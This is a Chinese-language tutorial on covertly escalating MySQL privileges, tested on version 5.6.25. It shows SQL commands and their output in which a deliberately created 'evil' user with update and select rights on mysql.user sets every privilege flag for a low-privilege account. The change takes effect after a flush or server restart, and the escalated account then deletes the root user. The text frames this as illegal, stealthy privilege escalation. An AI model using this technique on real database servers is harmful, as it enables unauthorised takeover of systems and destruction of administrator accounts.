如何悄悄地提升MySQL用户权限

温馨提示：

一次成功的非法提权，需要的必备条件是：
1、对mysql权限表的查、改权限；

2、一次不经意的数据库服务器重启； 

此次测试版本：5.6.25

准备邪恶用户：

　　grant update on mysql.user to heike@'localhost' identified by 'heike';

　　用heike@localhost登录数据库；

　　mysql> select * from user;

　　ERROR 1142 (42000): SELECT command denied to user 'heike'@'localhost' for table 'user'

　　mysql> update mysql.user set user='test003' where user='test03';

　　ERROR 1143 (42000): SELECT command denied to user 'heike'@'localhost' for column 'user' in table 'user'

　　好吧，失败，在给heike@localhost关于user表的select权限；

　　mysql> grant select on mysql.user to heike@'localhost' identified by 'heike';

　　Query OK, 0 rows affected (0.00 sec)

　　现在heike@localhost可以正常地访问mysql.user表了。

 

准备测试用户：

mysql>  show grants for test02@'localhost';

+---------------------------------------------------------------------------------------------------------------+

| Grants for test02@localhost                                                                                   |

+---------------------------------------------------------------------------------------------------------------+

| GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD '*1556A6F65259CE3FBEA8489096F7797B4E0D5BEC' |

| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                                                        |

+---------------------------------------------------------------------------------------------------------------+

2 rows in set (0.00 sec)

test02@'localhost'只有查询db_test库t1表的权限

 

现在开始用heike@localhost给test02@'localhost'提权。

就给test02@'localhost'一个超大的权限吧。使用heike@localhost执行：

update mysql.user set  Select_priv='Y',

           Insert_priv='Y',

           Update_priv='Y',

           Delete_priv='Y',

           Create_priv='Y',

             Drop_priv='Y',

           Reload_priv='Y',

         Shutdown_priv='Y',

          Process_priv='Y',

             File_priv='Y',

            Grant_priv='Y',

       References_priv='Y',

            Index_priv='Y',

            Alter_priv='Y',

          Show_db_priv='Y',

            Super_priv='Y',

 Create_tmp_table_priv='Y',

      Lock_tables_priv='Y',

          Execute_priv='Y',

       Repl_slave_priv='Y',

      Repl_client_priv='Y',

      Create_view_priv='Y',

        Show_view_priv='Y',

   Create_routine_priv='Y',

    Alter_routine_priv='Y',

      Create_user_priv='Y',

            Event_priv='Y',

          Trigger_priv='Y',

Create_tablespace_priv='Y'

where user='test02' and host='localhost';

Query OK, 1 row affected (0.04 sec)

Rows matched: 1  Changed: 1  Warnings: 0

 

但是再查看test02@localhost的权限

+----------------------------------------------------------------------------+

| Grants for test02@localhost                                                |

+----------------------------------------------------------------------------+

| GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret> |

| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                     |

+----------------------------------------------------------------------------+

2 rows in set (0.00 sec)

好吧，权限没变。但是不要灰心

 

让我们静静地等在在某一天，有flush privileges 权限的用户执行下：

mysql>flush privileges;

这时再看看test02@localhost的权限

mysql> show grants for test02@localhost;

+-------------------------------------------------------------------------------------------------------+

| Grants for test02@localhost                                                                           |

+-------------------------------------------------------------------------------------------------------+

| GRANT ALL PRIVILEGES ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret> WITH GRANT OPTION |

| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                                                |

+-------------------------------------------------------------------------------------------------------+

2 rows in set (0.00 sec)

这是你是不是觉得test02@localhost已经成功逆袭为高富帅了？

既然你这么以为，就让他把`db_test`.`t1`删掉吧

mysql> drop table db_test.t1;

ERROR 1142 (42000): DROP command denied to user 'test02'@'localhost' for table 't1'

What！居然不能删除，还提示权限不足。这一定是误会，让我再尝试一下：

mysql> select user,host,password from mysql.user;

ERROR 1142 (42000): SELECT command denied to user 'test02'@'localhost' for table 'user'

what！连查询都不行，说好的ALL PRIVILEGES呢！

让我再尝试一下，新建一张普通表t2看test02@localhost能访问不。

mysql> select * from db_test.t2;

ERROR 1142 (42000): SELECT command denied to user 'test02'@'localhost' for table 't2'

好吧，至此'test02'@'localhost'的权限没有丝毫改变

 

继而重启服务器

>service mysqld restart

再试试：

mysql> drop user root@'::1';

Query OK, 0 rows affected (0.08 sec)

mysql> select user();

+------------------+

| user()           |

+------------------+

| test02@localhost |

+------------------+

1 row in set (0.00 sec)

哈哈！看看。此时的test02@localhost已经将root用户干掉了！